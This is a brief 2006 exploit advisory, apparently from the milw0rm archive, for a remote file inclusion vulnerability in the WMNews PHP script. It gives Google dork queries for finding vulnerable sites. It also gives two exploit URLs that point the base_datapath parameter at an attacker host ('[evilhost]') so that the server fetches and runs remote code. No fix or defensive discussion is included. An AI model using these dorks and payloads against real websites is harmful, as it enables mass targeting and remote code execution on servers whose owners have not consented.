Advisory: WMNews Remote File Include Vulnerability Release Date: 2006/07/26 Author: uNfz Critical Level: High Contact: unfzbr@hotmail.com Vendor: Warta Mikael -------------------- -------------------- Searching / Dork: allinurl: *.php?Artid=* allinurl: *.php?ArtCat=* allinurl: wmprint.php allinurl: wmview.php -------------------- exploration: /index.php?config=1&base_datapath=http://[evilhost] /[dir]/index.php?config=1&base_datapath=http://[evilhost] -------------------- uNfz irc.efnet.org # milw0rm.com [2006-07-27]